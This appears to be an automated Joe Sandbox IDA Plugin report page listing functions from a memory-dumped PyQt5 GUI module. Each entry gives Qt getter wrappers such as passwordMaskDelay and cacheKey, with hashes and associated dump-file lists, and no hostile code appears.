Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?fontBool_CharFormat@@FromLongTextUnderline@
String ID: QTextCharFormat$fontUnderline$fontUnderline(self) -> bool
API String ID: 1257658737-2331075746
Opcode ID: dee3dfe922db54ad9c41388a90926fecfc2e44dc1059069b0330c185a9c471a8
Instruction ID: b60ecfcc81037cd5eb53b4b8a19f9dd3cda9afa6ea29945ba84e5386027da16d
Opcode Fuzzy Hash: dee3dfe922db54ad9c41388a90926fecfc2e44dc1059069b0330c185a9c471a8
Instruction Fuzzy Hash: 20017CB5A08B46C1EB109F70E8886A837B8FB94784F9140B2CA5D03320CF7CD649C380

Function 00007FFB9A337C30 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?passwordMaskDelay@QStyleHints@@QEBAHXZ.QT5GUI ref: 00007FFB9A337C7B
PyLong_FromLong.PYTHON3 ref: 00007FFB9A337C83

Strings

passwordMaskDelay(self) -> int, xrefs: 00007FFB9A337C95
passwordMaskDelay, xrefs: 00007FFB9A337CA1
QStyleHints, xrefs: 00007FFB9A337CA8

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?passwordDelay@FromHints@@LongLong_MaskStyle
String ID: QStyleHints$passwordMaskDelay$passwordMaskDelay(self) -> int
API String ID: 2384457329-852844189
Opcode ID: b1249ec08ec39163fa56b64a8ca5f2deba2498fcb83ada6aec1ae1a5f06ad432
Instruction ID: e588d3ace78bb4f2d51bc45954506446624abdfb573163083ae394a54f69783e
Opcode Fuzzy Hash: b1249ec08ec39163fa56b64a8ca5f2deba2498fcb83ada6aec1ae1a5f06ad432
Instruction Fuzzy Hash: 72011AB5A08B46C1EB50DF70E8486A933A8FB54744FA140B6CA5C43320DF7CD549C380

Function 00007FFB9A2FBC60 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?formatIndex@QTextInlineObject@@QEBAHXZ.QT5GUI ref: 00007FFB9A2FBCAB
PyLong_FromLong.PYTHON3 ref: 00007FFB9A2FBCB3

Strings

formatIndex, xrefs: 00007FFB9A2FBCD1
QTextInlineObject, xrefs: 00007FFB9A2FBCD8
formatIndex(self) -> int, xrefs: 00007FFB9A2FBCC5

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?formatFromIndex@InlineLongLong_Object@@Text
String ID: QTextInlineObject$formatIndex$formatIndex(self) -> int
API String ID: 1124102696-4158125137
Opcode ID: 2a6de199fef673410a5b2d7b1dec26ea8998e1d537f2c4977408f2b9faece461
Instruction ID: 586403c8c57769a37a953417b088e29fb8260f35b9be86afb79a0fc2b3212615
Opcode Fuzzy Hash: 2a6de199fef673410a5b2d7b1dec26ea8998e1d537f2c4977408f2b9faece461
Instruction Fuzzy Hash: 360116B5B08A46C1EB60DF71E8496A933B8FB54B44FA180B2CA5D43360CF7DD54AC380

Function 00007FFB9A333900 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30windowCOMMON

Download Yara Rule

APIs

?cacheKey@QPalette@@QEBA_JXZ.QT5GUI ref: 00007FFB9A33394B
PyLong_FromLongLong.PYTHON3 ref: 00007FFB9A333954

Strings

cacheKey(self) -> int, xrefs: 00007FFB9A333966
cacheKey, xrefs: 00007FFB9A333972
QPalette, xrefs: 00007FFB9A333979

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Long$?cacheFromKey@Long_Palette@@
String ID: QPalette$cacheKey$cacheKey(self) -> int
API String ID: 2320330629-3830211667
Opcode ID: 597111e6d7163a6d03b56b730ce0d366d92a1e591436cfe90084aeadb628d1f5
Instruction ID: 342e40cd6f6c02e846808a64d8b9fa6fb9a52a532f44f6e21a5f885101452058
Opcode Fuzzy Hash: 597111e6d7163a6d03b56b730ce0d366d92a1e591436cfe90084aeadb628d1f5
Instruction Fuzzy Hash: 26012CB5A08B47C1EB10DF61E8586A933A8FB85B44FA140B6CE5D43320DFBCD949C740

Function 00007FFB9A3078B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?positionInBlock@QTextCursor@@QEBAHXZ.QT5GUI ref: 00007FFB9A3078FB
PyLong_FromLong.PYTHON3 ref: 00007FFB9A307903

Strings

positionInBlock, xrefs: 00007FFB9A307921
positionInBlock(self) -> int, xrefs: 00007FFB9A307915
QTextCursor, xrefs: 00007FFB9A307928

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?positionBlock@Cursor@@FromLongLong_Text
String ID: QTextCursor$positionInBlock$positionInBlock(self) -> int
API String ID: 3223810010-281852591
Opcode ID: 43a143c19e069f83f6300529b0a11c7dd3ee9a6f8a81e10df208d18756fc22bf
Instruction ID: 27d7c7061a6de0dd466a2c1ae93fc8c995af498f65b652a9919bb99edcbc592f
Opcode Fuzzy Hash: 43a143c19e069f83f6300529b0a11c7dd3ee9a6f8a81e10df208d18756fc22bf
Instruction Fuzzy Hash: 68012CB5B08F56C1EB109F71E8486A933A8FB54784F9140B2CA5C53320CF7DD549C380

Function 00007FFB9A3178B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?lengthSquared@QVector4D@@QEBAMXZ.QT5GUI ref: 00007FFB9A3178FB
PyFloat_FromDouble.PYTHON3 ref: 00007FFB9A317905

Strings

lengthSquared, xrefs: 00007FFB9A317923
QVector4D, xrefs: 00007FFB9A31792A
lengthSquared(self) -> float, xrefs: 00007FFB9A317917

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?lengthDoubleFloat_FromSquared@Vector4
String ID: QVector4D$lengthSquared$lengthSquared(self) -> float
API String ID: 1654663368-1278755285
Opcode ID: c4fc69ece7319acf1cb637e9832749c80efaa04725e374bc5d1015fcf8320a0b
Instruction ID: da17624fba77f8f1b52e9add863b7c90c0b33ac69206ce5aa5546e856b21373b
Opcode Fuzzy Hash: c4fc69ece7319acf1cb637e9832749c80efaa04725e374bc5d1015fcf8320a0b
Instruction Fuzzy Hash: 9E0121B1A08B46C1EB11DF70E8486A937B8FB55754FA140B2CA5D43320DF7DD59AC740

Function 00007FFB9A33F8B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?revision@QTextBlock@@QEBAHXZ.QT5GUI ref: 00007FFB9A33F8FB
PyLong_FromLong.PYTHON3 ref: 00007FFB9A33F903

Strings

revision(self) -> int, xrefs: 00007FFB9A33F915
revision, xrefs: 00007FFB9A33F921
QTextBlock, xrefs: 00007FFB9A33F928

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?revision@Block@@FromLongLong_Text
String ID: QTextBlock$revision$revision(self) -> int
API String ID: 951426660-719575464
Opcode ID: 374ac0ba64cbf39453fc5182a68cd01c4e794e8f39699853534e6c538362fc8c
Instruction ID: 76163e4ee30c65f2515b686f7adc5d6349278d6fbe4a8c87d2f150cf907a5575
Opcode Fuzzy Hash: 374ac0ba64cbf39453fc5182a68cd01c4e794e8f39699853534e6c538362fc8c
Instruction Fuzzy Hash: D0012CB5B08B46D1EB209F70E8586A833A8FB94744F9140B6CA5D43320CF7CD549C380

Function 00007FFB9A34B970 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?isCheckable@QStandardItem@@QEBA_NXZ.QT5GUI ref: 00007FFB9A34B9BB
PyBool_FromLong.PYTHON3 ref: 00007FFB9A34B9C4

Strings

isCheckable(self) -> bool, xrefs: 00007FFB9A34B9D6
QStandardItem, xrefs: 00007FFB9A34B9E9
isCheckable, xrefs: 00007FFB9A34B9E2

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Bool_Checkable@FromItem@@LongStandard
String ID: QStandardItem$isCheckable$isCheckable(self) -> bool
API String ID: 2386528663-3434318923
Opcode ID: aa312d8b98150259836715bcaa803466a6e91f0835d1139ccac08603479462d0
Instruction ID: 1e454e205e54b7a33cfa8725ce660b6f84122258ead01d7e834813cf343693bc
Opcode Fuzzy Hash: aa312d8b98150259836715bcaa803466a6e91f0835d1139ccac08603479462d0
Instruction Fuzzy Hash: 05011AB5B08A46C1EB10DF61E8996A833A8FB94795F9140B6CA5D03320CF7CD559C340

Function 00007FFB9A339980 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?useHoverEffects@QStyleHints@@QEBA_NXZ.QT5GUI ref: 00007FFB9A3399CB
PyBool_FromLong.PYTHON3 ref: 00007FFB9A3399D4

Strings

useHoverEffects(self) -> bool, xrefs: 00007FFB9A3399E6
useHoverEffects, xrefs: 00007FFB9A3399F2
QStyleHints, xrefs: 00007FFB9A3399F9

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?useBool_Effects@FromHints@@HoverLongStyle
String ID: QStyleHints$useHoverEffects$useHoverEffects(self) -> bool
API String ID: 4102397269-227917006
Opcode ID: 33eed10f73b7049befdabf31c755359ca6bbb407ad900a2b9374ce14e0e36b48
Instruction ID: be90194fb323f57bd645e5814147ee8e555f2f610b48a34a8f2a5d7d3c0ed361
Opcode Fuzzy Hash: 33eed10f73b7049befdabf31c755359ca6bbb407ad900a2b9374ce14e0e36b48
Instruction Fuzzy Hash: 38012CB5A08A46D1EB10DF71E8986A937A8FB54754F9140B6CA9D03320CF7CD649C340

Function 00007FFB9A317940 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 30COMMON

Download Yara Rule

APIs

?doubleProperty@QTextFormat@@QEBANH@Z.QT5GUI ref: 00007FFB9A317990
PyFloat_FromDouble.PYTHON3 ref: 00007FFB9A317996

Strings

height, xrefs: 00007FFB9A3179B4
QTextImageFormat, xrefs: 00007FFB9A3179BB
height(self) -> float, xrefs: 00007FFB9A3179A8

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
